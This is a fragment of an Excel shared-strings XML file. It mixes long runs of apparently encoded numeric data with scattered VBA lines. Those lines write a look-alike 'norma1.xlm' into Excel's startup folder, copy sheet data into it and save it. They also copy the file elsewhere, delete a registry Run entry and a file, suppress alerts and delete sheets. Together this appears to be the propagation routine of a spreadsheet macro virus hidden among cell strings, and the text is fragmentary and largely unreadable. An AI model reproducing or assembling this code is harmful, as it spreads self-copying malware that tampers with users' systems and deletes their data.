    <t xml:space="preserve">248 255 25 248 59 137 211 82 80 142 52 124 61 91 74 194 235 164 121 205 115 40 220 63 9 205 184 164 172 25 253 86 245 115 45 94 87 230 123 62 135 243 195 249 244 13 231 183 230 243 23 107 11 175 107 19 181 95 240 188 150 211 216 73 109 102 252 85 237 172 207 243 254 179 182 176 221 33 186 69 173 221 9 117 74 253 132 227 13 29 27 178 200 49 102 113 191 201 250 95 135 253 16 40 109 118 101 95 225 55 17 47 229 54 218 149 251 250 80 227 199 216 236 89 251 97 112 123 17 5 165 172 255 88 90 234 243 140 63 238 247 150 60 239 217 58 113 62 151 39 63 129 243 13 121 242 71 235 11 227 122 170 190 48 174 167 235 11 227 58 162 217 44 132 235 12 95 24 215 5 190 176 126 117 242 95 126 253 40 219 54 30 135 97 141 125 251 249 220 248 30 230 115 227 101 130 87 175 75 16 110 1 205 122 91 214 13 140 103 55 176 4 24 155 12 88 90 176 172 194 146 193 146 195 210 134 165 171 65 241 55 226 13 234 117 5 153 55 42 168 1 42 65 29 164 88 234 48 117 148 250 144 50 128 220 126 119 182 223 18 132 191 165 170 244 136 124 127 196 239 6 89 229 25 216 1 15 205 206 247 127 12 48 125 77 142 244 86 167 226 7 107 227 124 93 54 181 255 56 87 222 166 246 31 73 186 31 166 27 114 164 31 135 233 55 242 248 99 211 243 210 247 201 247 53 121 51 115 95 69 89 229 199 53 229 59 97 31 191 67 125 64 149 209 43 41 180 211 141 201 49 191 199 249 60 239 121 184 60 235 88 62 55 190 78 216 53 251 113 161 93 29 119 204 247 15 227 142 111 6 222 161 182 229 124 142 100 47 140 87 22 71 97 188 178 57 10 227 85 171 163 48 94 133 29 133 241 106 196 49 31 175 134 157 36 54 25 199 201 59 21 188 250 159 250 223 154 249 144 224 129 203 137 215 15 78 108 23 80 94 206 17 71 47 251 64 57 226 212 171 156 255 217 248 113 210 158 9 44 39 157 10 55 42 137 102 70 127 209 158 232 236 119 92 100 191 52 218 31 157 43 125 238 89 68 86 132 89 11 142 23 71 49 64 249 122 204 0 38 139 231 226 </t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245 28 197 129 56 197 176 167 146 44 211 131 163 174 78 128 17 10 69 53 161 104 220 109 88 162 168 166 211 48 61 140 143 81 156 123 230 252 93 252 102 95 191 168 92 39 78 213 128 8 69 180 180 149 206 104 189 172 165 120 181 49 67 162 187 53 209 215 228 88 222 221 5 231 0 84 167 71 24 167 116 114 116 109 17 216 219 220 238 29 2 110 225 67 74 167 138 230 230 52 245 24 230 250 225 3 42 195 175 7 219 67 41 252 123 30 1 145 229 193 10 57 133 225 216 69 105 175 183 69 105 127 86 123 178 163 193 181 108 43 115 209 224 121 218 153 206 42 119 140 150 185 57 229 40 124 18 101 13 244 234 104 242 22 189 58 138 122 84 143 234 45 3 234 143 15 163 56 106 212 226 106 48 45 199 56 23 207 197 186 161 168 115 196 174 132 36 186 111 18 133 157 208 231 226 31 84 215 163 232 138 246 90 69 176 137 47 206 161 79 146 68 189 3 20 117 173 232 159 60 190 248 122 217 209 218 36 253 60 208 182 215 70 161 232 219 204 120 108 237 66 95 89 158 197 209 74 36 170 91 158 149 105 212 111 19 50 193 193 223 97 79 152 129 234 227 194 232 131 59 122 164 221 180 30 179 27 224 235 250 73 255 106 88 65 72 116 125 11 222 237 205 96 233 34 81 245 89 44 28 242 125 96 57 65 118 135 47 80 250 209 45 220 164 208 214 128 240 27 183 41 122 142 119 67 249 177 36 199 113 44 83 88 206 96 217 9 50 253 152 173 103 173 56 63 172 57 127 34 79 52 7 169 119 155 65 45 253 88 198 177 28 193 242 184 70 146 252 105 44 103 72 148 8 158 41 24 44 93 88 218 176 28 193 242 12 150 73 44 227 37 234 153 102 212 168 62 158 198 242 134 70 106 211 73 121 27 62 127 88 35 207 96 57 98 84 95 135 28 19 239 220 64 240 198 168 150 2 150 40 82 2 </t>
  </si>
  <si>
    <t xml:space="preserve">233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 236 20 245 87 46 187 68 229 110 5 111 80 57 114 95 136 81 239 76 233 124 252 211 226 184 140 67 40 42 1 162 6 226 53 189 181 214 211 50 250 20 19 252 41 85 88 33 8 30 161 232 131 108 150 18 194 254 17 46 81 71 196 146 167 24 227 88 191 147 134 140 158 100 230 179 76 189 41 131 186 60 177 11 98 167 136 118 62 223 252 138 250 57 109 80 250 121 18 159 135 142 243 149 71 229 136 157 85 97 41 148 160 118 101 230 119 178 218 69 84 47 168 252 241 44 59 204 212 75 3 62 30 144 202 97 74 25 173 112 96 152 104 196 39 97 129 127 43 225 149 2 64 2 153 243 78 3 154 70 209 61 104 252 80 212 209 9 120 124 65 99 207 195 37 104 92 75 128 59 22 13 237 64 12 169 224 138 124 165 197 160 169 70 61 82 53 203 218 236 94 123 99 155 203 107 135 101 42 232 115 192 4 30 149 196 8 179 78 220 217 23 20 123 174 128 69 176 77 119 208 87 64 21 173 180 248 91 52 226 0 161 149 254 197 215 187 96 252 178 215 187 239 43 93 15 217 147 90 255 230 235 30 178 51 37 207 35 252 19 207 231 95 245 188 9 100 199 240 172 77 212 77 124 190 194 136 114 148 120 230 114 254 219 192 80 170 248 89 150 44 94 96 52 46 202 247 119 54 81 43 224 121 196 86 138 128 39 20 218 101 7 196 207 201 206 143 83 231 233 249 233 30 1 125 51 5 141 59 193 203 227 88 198 49 14 29 199 114 24 203 51 88 142 148 102 236 111 22 71 33 101 231 79 98 57 161 201 159 204 146 231 160 21 191 123 249 87 55 79 37 25 48 32 107 108 57 76 99 193 169 179 239 95 57 251 198 196 71 23 46 159 30 123 231 237 243 159 158 61 253 218 199 111 93 71 199 175 95 190 252 193 248 95 78 95 68 26 157 128 88 114 144 42 133 51 62 75 81 208 243 80 </t>
  </si>
  <si>
    <r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">158 44 24 76 153 246 143 1 42 231 104 144 145 170 6 117 208 14 242 149 170 80 149 82 70 14 102 176 86 94 158 175 77 255 141 250 51 120 51 131 251 41 142 239 39 77 112 205 132 252 158 164 236 225 200 243 187 25 227 132 57 195 70 192 192 217 234 156 172 83 229 240 234 44 236 161 99 122 244 9 122 69 235 23 233 213 169 99 24 241 104 189 71 168 208 147 183 227 227 38 5 87 80 148 69 198 47 19 163 18 199 22 188 103 45 75 141 96 2 183 136 235 99 160 30 254 234 53 165 171 193 221 122 10 158 99 211 175 0 126 216 79 43 64 128 214 201 136 176 39 20 233 225 119 199 250 162 80 139 208 156 96 151 199 191 21 247 3 218 133 157 193 65 204 5 20 64 4 48 196 10 116 248 190 60 248 136 146 113 218 128 215 7 115 235 22 51 154 23 21 118 159 73 124 103 132 237 103 50 107 126 184 96 158 99 227 233 123 61 31 27 79 42 109 31 70 28 60 19 30 159 68 249 129 109 239 122 239 122 143 115 29 112 184 235 221 182 245 238 122 96 183 221 227 170 119 223 235 4 174 122 155 203 102 115 120 18 78 231 189 118 207 234 33 243 62 1 19 242 252 166 221 64 8 121 36 74 52 141 203 132 60 62 154 16 242 136 227 132 144 231 76 185 87 64 108 60 146 88 185 164 3 32 54 30 68 198 99 65 108 60 139 170 189 49 137 65 100 60 223 45 109 110 141 129 174 64 95 55 179 21 246 164 191 121 64 12 70 37 166 211 29 14 51 110 74 15 76 190 36 226 215 41 241 39 202 120 240 115 240 152 47 210 34 6 194 27 169 117 96 91 189 221 108 52 27 143 180 38 154 18 110 196 217 163 91 6 118 108 22 247 32 178 33 208 5 113 136 243 12 62 54 226 11 48 91 129 73 98 138 140 163 86 179 113 227 206 68 9 127 248 61 91 135 191 79 122 218 124 168 100 75 68 167 91 216 142 92 127 137 163 237 214 162 10 22 41 133 5 105 133 142 130 166 102 97 58 252 34 120 164 57 222 71 69 117 15 32 114 156 30 38 140 200 113 54 85 28 46 55 47 180 50 188 55 20 30 124 231 118 179 209 0 87 12 27 150 32 94 159 165 198 </t>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 46 75 244 247 134 34 131 192 248 168 4 200 156 66 139 61 66 241 195 190 238 72 8 116 12 134 197 198 166 120 32 225 13 245 247 251 130 61 135 54 92 243 93 250 73 71 36 150 120 67 183 61 49 164 127 228 64 115 212 35 238 12 69 68 147 55 32 156 109 59 84 199 120 125 150 96 183 24 112 159 132 160 109 9 136 190 32 24 222 18 100 20 166 163 148 83 138 93 21 62 221 44 198 163 39 159 123 225 16 109 58 220 196 208 1 191 79 146 46 87 173 117 55 186 117 93 165 211 20 91 116 253 193 110 191 78 120 242 97 169 215 19 138 115 128 85 192 148 77 49 43 25 119 119 180 51 88 186 21 172 132 75 122 4 167 128 224 41 32 128 74 93 191 170 83 240 148 62 125 49 85 59 208 245 184 40 209 155 67 244 183 107 153 129 174 230 198 56 56 208 127 48 248 215 238 159 149 13 116 125 178 142 246 46 62 172 107 98 94 106 40 219 145 126 234 246 235 197 155 67 47 221 38 80 27 131 237 85 209 8 39 44 185 218 92 199 176 128 103 173 136 213 200 182 116 5 45 50 163 119 254 195 120 240 68 59 156 176 123 30 20 7 37 134 221 91 5 93 193 3 167 132 98 175 223 7 130 189 50 139 185 27 116 119 139 146 196 196 3 160 77 244 245 108 9 6 6 129 217 184 33 212 17 98 118 127 30 235 235 188 71 140 252 13 108 168 16 152 253 21 246 26 216 184 232 155 223 111 254 33 191 14 244 249 2 161 94 137 139 63 27 88 174 107 79 187 220 146 21 196 77 161 61 79 47 73 173 98 161 141 127 36 129 187 154 56 118 201 181 69 190 209 19 175 46 210 245 172 48 27 125 246 70 179 113 118 41 107 102 63 46 249 173 105 191 35 116 98 127 89 172 108 234 170 45 177 40 81 246 241 134 75 79 184 83 47 235 22 235 103 199 174 141 41 142 255 191 122 133 87 </t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <t xml:space="preserve">204 43 95 189 206 94 253 99 247 6 175 126 225 190 131 190 23 118 92 74 63 194 66 40 153 134 88 34 184 250 95 254 53 83 118 240 123 107 129 249 202 14 93 201 172 105 95 247 129 133 109 29 157 145 190 126 238 161 54 176 73 239 5 112 69 42 113 171 86 215 89 24 167 149 159 216 21 19 173 186 180 227 1 134 69 216 245 29 254 205 138 151 13 150 221 147 156 52 18 31 12 187 3 98 100 36 250 202 250 31 23 177 186 63 236 178 242 50 165 212 123 66 135 157 74 214 38 7 194 225 89 250 51 122 246 71 247 89 22 235 130 201 59 91 245 87 215 184 239 159 149 118 204 74 246 225 122 195 107 171 47 174 92 159 216 218 247 248 72 145 157 233 92 83 185 89 2 82 236 173 96 199 182 207 134 36 174 239 207 131 19 79 124 190 203 254 122 121 185 113 35 117 229 190 71 217 232 130 217 35 69 110 122 213 146 133 174 138 133 250 206 247 239 157 26 250 92 226 166 42 167 134 208 207 210 103 238 120 230 147 169 161 242 103 223 91 224 13 85 238 125 242 200 69 106 255 121 106 106 40 189 7 229 86 254 224 79 67 174 41 165 100 234 249 8 103 190 214 228 88 179 244 151 63 253 108 237 243 247 39 78 218 118 181 139 81 19 179 71 88 222 246 11 113 75 215 83 64 236 142 114 44 92 161 39 240 18 189 115 181 131 237 164 196 184 112 132 61 203 118 175 106 220 190 170 136 111 213 217 206 237 225 147 109 177 32 83 73 165 162 204 129 129 132 215 31 225 156 171 172 201 237 187 109 13 235 99 129 200 249 9 16 213 213 185 24 91 29 189 187 218 48 218 229 239 163 131 189 113 211 173 211 99 253 223 255 251 55 79 8 103 195 248 54 0 128 67 75 220 61 11 120 20 229 181 255 206 78 146 77 8 16 32 96 128 16 192 152 38 34 224 238 38 196 4 40 154 39 65 67 2 73 128 180 6 179 175 217 236 146 217 157 237 236 108 30 202 133 160 160 84 107 109 109 125 92 172 138 104 125 85 124 163 96 171 60 228 90 172 124 92 236 245 83 110 189 126 133 214 235 5 175 90 169 168 81 146 157 123 206 63 255 236 108 50 81 1 191 222 246 222 205 </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 207 218 254 36 218 0 92 48 93 243 251 72 144 200 223 66 200 108 64 127 26 179 203 120 166 245 227 247 65 255 43 241 201 82 203 106 205 189 144 185 143 176 67 130 32 179 208 185 36 155 217 17 155 202 236 152 177 251 155 175 50 247 41 221 46 96 62 179 63 198 194 75 24 60 55 115 211 235 146 237 255 113 100 23 179 87 246 122 234 80 251 101 72 197 134 84 189 165 56 106 213 113 102 26 251 24 42 131 176 36 205 252 157 90 253 135 182 121 208 18 85 58 251 112 246 125 172 140 195 102 46 99 37 211 82 181 183 121 206 79 213 190 62 54 61 85 251 234 214 94 139 102 213 208 194 105 110 5 115 255 55 78 144 50 65 170 145 192 113 12 135 26 230 246 50 247 95 153 59 150 225 212 200 220 91 152 43 130 155 141 254 116 49 147 12 244 247 168 36 202 43 42 154 7 68 45 150 168 168 124 68 77 129 37 49 71 180 136 136 122 218 62 216 159 163 242 173 106 81 155 10 107 103 94 164 185 81 7 98 19 213 209 62 252 14 108 171 186 170 76 229 201 252 58 53 133 172 62 125 113 145 122 122 186 77 85 167 58 121 162 168 17 245 66 158 136 106 171 90 202 147 50 53 71 205 93 15 44 157 0 124 252 254 215 129 92 222 170 14 74 101 106 1 108 164 41 212 2 158 215 209 162 217 120 86 51 81 227 119 66 67 144 11 129 50 149 87 137 58 175 76 37 142 1 127 29 20 253 122 140 227 119 165 17 134 25 113 178 58 190 169 4 159 40 113 117 81 157 202 209 18 243 219 104 209 145 75 108 41 83 231 2 118 5 69 71 227 152 27 136 249 56 254 181 196 108 177 209 2 131 247 50 178 108 180 58 36 140 178 207 166 146 58 168 208 70 10 230 231 168 163 224 255 209 120 6 41 136 239 221 19 199 38 213 177 200 212 176 136 63 58 137 236 96 195 159 102 194 48 133 189 186 </t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t xml:space="preserve">48 69 84 201 184 83 154 173 72 44 240 48 21 154 9 218 152 113 16 228 163 104 136 61 200 172 196 153 159 102 3 210 158 100 19 81 1 126 69 224 17 33 190 21 30 94 69 165 184 21 112 229 72 17 60 54 120 246 88 217 247 135 19 50 71 77 95 206 249 70 193 99 2 148 187 136 137 76 218 41 178 17 191 24 194 135 13 220 209 202 77 103 88 29 236 175 87 7 62 107 83 201 88 190 77 29 240 215 171 171 79 23 231 94 207 145 54 168 132 47 83 83 50 201 5 163 201 232 58 52 185 94 166 85 89 120 60 94 104 83 11 139 212 79 209 62 236 212 243 17 135 89 249 17 117 234 28 50 171 118 161 122 213 4 146 77 6 131 7 226 3 159 29 137 51 68 166 148 169 165 54 178 80 45 130 134 56 30 39 19 248 35 241 248 222 122 21 121 143 213 125 64 0 67 21 49 164 216 234 201 105 44 185 199 66 46 162 246 58 135 210 61 53 155 124 74 191 245 60 72 157 55 47 86 212 220 42 139 185 125 172 19 242 186 112 71 153 85 184 80 157 58 145 100 76 130 54 154 183 80 37 185 154 201 207 28 181 160 176 94 45 248 20 249 140 101 232 59 136 41 121 239 113 212 80 150 142 75 42 195 101 3 119 198 184 84 115 164 107 88 174 243 128 67 69 106 1 2 76 161 114 183 63 110 240 56 151 241 248 136 37 135 216 246 199 227 219 22 170 154 248 12 126 50 153 76 222 19 183 237 129 56 27 61 164 179 144 129 149 47 67 29 208 123 203 212 253 241 61 241 210 84 198 221 220 5 156 193 203 188 74 36 33 37 111 133 70 203 216 4 95 238 180 208 47 81 158 57 63 184 188 119 17 194 153 146 254 28 167 181 228 89 85 65 150 175 207 34 167 200 43 131 253 253 113 96 76 81 61 29 81 202 140 241 161 140 117 247 253 241 85 11 113 212 204 73 140 154 133 56 106 94 200 83 102 64 127 95 168 246 199 115 235 172 100 156 216 163 14 254 162 76 205 42 129 37 5 200 32 212 49 66 239 229 217 155 19 191 129 190 102 31 210 127 115 136 254 209 111 173 255 30 129 209 162 13 164 118 164 126 92 6 233 251 227 86 178 7 158 133 73 125 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t xml:space="preserve">248 56 148 89 107 213 172 78 252 253 231 142 226 162 28 128 199 3 131 79 197 1 40 147 188 195 40 121 34 218 198 157 74 196 83 241 193 96 157 10 35 93 60 240 70 124 147 133 92 138 3 65 171 58 240 97 255 8 37 170 161 4 96 146 144 133 92 114 218 142 114 169 213 142 61 247 82 254 247 113 202 241 111 132 65 7 164 223 199 79 169 175 232 197 161 219 94 106 72 12 76 77 133 109 116 122 250 122 56 104 236 76 159 110 82 242 54 89 168 236 143 2 154 227 235 222 136 63 75 206 112 254 60 16 103 115 219 193 120 242 148 115 48 174 113 255 64 60 105 254 60 24 63 16 255 7 157 63 31 166 243 39 16 179 51 254 181 196 140 60 127 34 97 230 249 51 29 254 63 172 205 159 155 207 126 254 28 54 10 145 9 14 182 230 230 45 57 214 146 33 253 47 151 217 22 198 223 187 80 211 27 240 244 195 243 77 115 233 65 232 131 7 226 67 231 82 59 179 207 60 240 138 182 98 61 156 174 175 245 181 248 100 139 48 201 118 156 39 193 178 175 12 118 2 22 102 189 121 33 117 45 204 229 152 107 213 172 170 175 215 202 124 147 253 230 212 33 247 124 234 40 141 179 201 46 182 2 197 149 51 79 138 200 80 251 205 227 44 198 90 34 111 218 73 182 178 40 33 95 232 107 106 40 101 3 40 51 70 44 53 115 196 210 249 179 73 57 91 222 114 180 82 59 185 224 12 42 157 77 122 89 41 43 45 85 66 134 110 213 70 46 133 42 222 189 204 111 228 182 94 198 1 161 211 94 103 9 101 195 12 84 159 219 207 242 231 167 250 44 236 214 149 125 22 199 253 36 157 68 178 83 97 66 184 150 35 190 135 173 60 201 128 58 87 86 86 44 147 165 53 194 102 175 146 130 251 161 203 184 236 53 169 92 198 119 185 140 52 78 182 100 219 82 82 199 167 115 227 233 245 169 159 147 76 238 242 133 28 76 99 22 185 47 170 248 36 81 88 196 77 38 81 162 192 86 83 34 125 34 17 64 66 252 164 128 107 35 214 89 109 139 43 34 145 118 246 157 247 78 77 209 72 77 37 46 110 119 145 233 124 133 246 169 116 212 228 142 148 105 254 29 46 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">98 197 76 187 21 23 172 201 16 20 83 228 98 198 43 242 92 132 227 87 121 54 1 168 81 125 184 96 180 144 164 228 159 78 115 145 9 44 122 4 216 179 22 184 72 22 159 140 29 42 92 159 73 113 145 204 97 133 48 254 216 159 0 147 204 61 71 29 49 217 69 82 248 42 209 29 141 78 249 181 139 88 248 30 41 203 69 50 104 17 85 109 175 108 239 114 203 237 205 130 178 254 39 0 158 1 170 10 184 117 181 34 213 42 182 62 163 151 176 144 30 81 215 47 78 126 207 32 67 139 165 54 21 211 67 46 16 174 38 65 148 220 190 194 19 64 49 233 14 255 20 40 78 31 90 101 119 184 252 148 139 140 97 229 87 68 124 110 69 168 149 165 16 214 122 223 36 83 246 198 112 233 39 46 50 154 101 175 14 70 35 162 187 23 53 125 74 244 212 103 64 33 161 90 87 247 165 46 24 11 154 133 48 213 148 54 228 25 36 53 9 107 4 175 82 33 138 26 109 209 213 191 195 156 126 168 76 2 110 205 56 2 205 53 180 66 61 169 104 43 146 19 237 141 42 66 200 125 159 142 66 34 155 150 240 218 84 200 196 106 210 180 240 25 16 99 37 21 62 223 231 50 178 160 194 183 174 13 176 76 206 114 229 155 122 203 25 205 128 241 117 91 92 132 215 27 66 138 244 190 178 27 33 129 175 126 61 98 130 81 171 60 119 110 64 65 19 122 132 203 110 50 53 38 196 46 175 211 155 38 17 235 233 85 132 191 0 132 52 158 221 198 72 45 69 184 254 168 244 254 45 128 8 161 167 31 168 105 4 54 245 223 8 130 66 186 67 89 200 163 80 175 95 18 125 130 188 161 5 154 139 52 71 4 111 208 45 214 210 168 168 109 3 22 213 210 133 158 96 84 137 62 152 129 49 94 10 76 139 255 96 187 9 67 168 244 116 61 196 82 254 107 229 30 195 186 134 73 200 164 109 128 161 222 126 177 112 251 97 61 139 133 212 198 68 17 47 200 29 190 7 40 34 64 49 66 202 123 71 23 168 100 94 96 202 182 163 136 21 246 139 22 161 71 65 17 123 232 5 172 191 86 146 81 102 131 32 17 229 192 117 138 79 193 199 38 222 97 116 211 10 19 </t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t xml:space="preserve">130 254 212 109 216 182 66 207 119 86 155 228 85 232 57 116 210 104 240 42 84 95 79 185 25 185 186 198 109 166 116 77 198 54 35 239 74 183 24 19 222 189 194 36 144 122 59 100 204 70 146 169 184 55 72 211 238 6 96 188 110 95 245 203 191 0 81 188 24 65 63 114 231 159 157 64 54 132 155 4 204 81 25 243 251 15 191 79 243 215 54 183 52 173 168 106 9 1 247 82 249 238 102 165 87 20 182 220 140 41 157 130 28 22 196 98 103 251 47 129 34 62 97 35 245 196 119 112 16 9 160 55 63 23 243 137 17 132 38 200 139 110 119 145 137 124 184 33 22 242 8 114 163 191 18 132 44 218 34 209 114 143 129 124 79 130 140 67 210 48 69 17 194 173 229 26 98 141 93 130 44 186 35 17 193 23 202 67 212 27 87 214 52 213 87 44 91 86 83 189 35 27 90 129 79 50 82 251 189 1 148 221 128 38 160 183 143 55 245 29 138 92 227 81 163 239 52 7 175 22 62 58 141 173 28 237 70 124 176 17 15 29 50 181 45 102 155 234 70 242 68 244 110 147 32 7 241 98 189 48 80 248 4 113 53 128 24 63 180 72 82 234 162 119 112 236 193 190 21 125 124 189 169 201 116 46 253 54 100 66 151 86 118 75 49 242 223 75 57 179 254 67 100 128 191 54 216 35 248 96 120 235 108 253 5 242 57 92 35 203 85 146 79 40 232 130 246 216 104 3 8 86 24 202 162 130 220 37 248 28 95 92 99 142 116 126 121 13 194 137 94 189 204 173 4 80 6 226 99 1 45 2 45 222 190 180 162 117 89 69 75 93 67 197 210 154 102 1 169 196 163 182 101 114 176 11 186 234 107 128 9 207 71 21 57 182 102 30 52 219 176 177 119 104 225 247 26 76 76 196 130 111 110 193 217 77 20 167 93 133 136 47 9 43 32 74 110 241 131 1 108 105 61 84 23 236 8 60 159 14 68 83 172 45 68 242 251 97 52 58 254 40 109 123 234 199 28 23 172 70 182 104 39 168 157 55 33 98 18 200 201 134 66 28 127 180 145 69 129 94 140 237 121 253 139 192 1 218 107 105 155 236 108 215 7 252 33 93 151 166 13 6 176 175 122 122 159 109 51 229 129 81 </t>
  </si>
  <si>
    <r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
        <charset val="0"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">90 134 89 174 209 127 199 127 211 161 54 32 95 177 14 229 134 37 67 184 109 1 246 185 38 1 38 29 175 224 31 131 129 80 180 195 35 245 116 231 254 208 52 230 176 148 173 63 66 220 162 1 73 86 194 208 14 185 178 169 222 68 218 209 78 148 34 26 236 30 109 18 21 26 127 255 235 88 105 135 64 201 182 205 71 208 24 160 35 66 248 61 125 248 49 214 0 209 202 15 96 174 226 53 118 121 221 30 44 118 195 111 17 6 11 244 110 199 58 155 97 57 163 220 124 33 142 125 48 163 6 115 167 155 155 22 162 55 111 196 217 198 45 203 163 98 166 177 28 98 115 157 200 54 111 192 49 107 157 230 113 94 196 60 197 179 153 167 100 14 243 204 155 203 60 165 23 51 207 37 118 230 41 115 48 79 185 115 29 34 4 0 237 207 223 198 124 142 157 186 207 185 235 54 211 44 188 162 82 138 133 125 111 251 76 109 193 136 93 123 31 182 167 15 15 2 233 56 208 120 55 2 195 179 195 29 157 56 199 121 97 82 197 248 129 7 113 136 246 126 63 11 103 90 237 162 195 31 143 152 106 211 18 150 52 35 182 62 73 121 100 163 137 105 8 121 230 235 198 242 168 89 113 203 74 44 130 125 50 120 74 103 33 151 184 220 32 68 173 184 22 34 13 20 112 11 187 97 240 131 199 140 193 12 75 58 215 163 4 71 165 124 243 98 42 42 189 6 171 163 44 20 137 168 54 65 107 146 177 188 13 7 205 253 247 239 62 241 212 135 142 103 61 70 192 185 35 41 80 252 92 82 160 228 249 164 192 188 157 73 129 210 93 73 129 75 94 240 96 119 119 59 58 177 10 29 75 89 2 97 83 222 242 39 173 134 220 93 66 69 212 191 128 10 27 250 221 175 26 249 171 181 211 231 27 127 103 44 4 123 68 45 82 43 119 250 157 164 241 60 32 117 143 253 212 152 39 113 112 139 30 218 109 44 127 155 244 123 7 142 42 199 14 175 177 86 168 2 94 226 141 3 236 249 122 55 161 119 13 112 252 235 186 222 136 236 17 241 206 193 65 119 136 238 114 120 216 84 226 102 247 97 171 37 201 48 51 26 255 250 146 190 55 176 120 136 53 221 18 82 67 106 </t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t xml:space="preserve">191 133 53 221 124 112 231 66 40 159 148 195 83 69 230 67 13 218 249 219 98 248 95 65 214 17 7 196 84 65 120 41 252 53 146 6 22 179 148 44 129 88 204 215 204 98 180 211 59 221 45 101 190 26 240 205 37 213 164 30 254 242 33 38 8 27 160 24 113 19 17 54 118 149 224 70 33 198 11 254 90 216 18 201 224 86 144 8 252 137 52 214 13 91 165 32 196 135 233 29 199 164 157 182 197 204 7 180 42 92 252 173 248 224 0 60 139 193 181 39 241 65 134 218 59 224 191 155 132 40 142 65 130 187 182 40 165 31 49 196 244 40 60 126 192 116 6 240 2 95 125 9 82 243 133 109 195 66 53 164 21 160 214 0 23 202 161 158 70 112 43 161 158 145 160 212 144 30 90 6 57 84 78 219 6 33 123 200 26 136 243 210 28 245 80 202 67 177 146 73 239 16 206 236 28 81 66 138 135 241 227 108 57 227 100 18 98 112 102 21 180 126 3 252 181 128 63 10 56 224 166 86 0 30 21 67 222 182 196 22 23 121 133 101 21 240 121 160 44 82 93 67 219 56 6 113 18 228 55 90 56 249 151 145 104 95 39 72 78 45 180 109 53 197 166 10 240 156 7 124 51 172 40 161 141 164 57 240 84 3 220 121 140 138 10 106 105 201 78 173 18 105 241 206 4 21 142 191 89 251 134 104 62 108 47 31 192 16 191 162 109 147 203 156 125 235 82 133 60 207 19 158 35 36 149 179 16 180 123 152 1 110 22 55 244 196 91 123 123 235 236 79 59 147 85 44 24 50 255 186 98 28 201 129 86 15 208 126 188 138 246 217 78 192 86 130 191 78 146 61 162 57 81 85 157 200 125 117 25 85 69 99 246 84 231 194 37 89 62 29 24 139 1 158 92 179 214 65 193 150 141 0 118 47 167 165 171 234 147 63 100 186 35 6 2 65 145 27 151 99 0 223 66 178 88 34 220 223 255 141 79 251 63 0 14 255 95 126 228 92 120 41 175 189 189 117 207 210 250 199 187 199 197 123 182 157 159 167 73 188 246 213 121 212 178 238 172 253 205 196 27 6 231 206 209 123 210 219 79 62 37 220 51 101 122 253 182 192 230 252 237 247 215 247 235 249 245 119 71 182 183 150 </t>
  </si>
  <si>
    <t xml:space="preserve">95 249 174 237 228 150 228 175 192 230 36 89 62 210 52 184 229 220 149 22 149 60 214 172 157 9 165 247 101 227 113 45 73 172 252 169 62 148 69 186 195 189 168 235 229 244 60 48 233 141 131 85 136 22 194 189 26 106 184 83 18 97 216 175 19 242 221 68 233 234 96 136 222 210 208 131 18 129 81 78 47 45 184 189 1 106 47 88 15 139 81 128 214 152 8 215 244 4 21 66 150 19 75 95 22 13 3 94 77 137 170 240 158 42 228 110 73 84 229 151 100 66 174 98 133 45 100 177 164 72 120 125 71 175 122 9 148 246 36 66 65 24 219 99 132 223 152 67 67 168 156 195 15 9 234 21 215 75 225 14 2 195 156 17 150 34 132 92 151 168 42 44 116 19 178 41 17 108 144 0 205 235 97 29 151 8 6 130 8 224 134 4 128 134 152 8 108 185 13 214 129 90 120 89 12 175 198 18 114 119 34 6 24 31 11 1 61 15 36 160 54 11 0 245 9 35 24 243 16 242 116 2 34 218 119 36 228 153 4 65 72 236 179 70 170 28 3 88 47 37 152 181 42 0 203 121 66 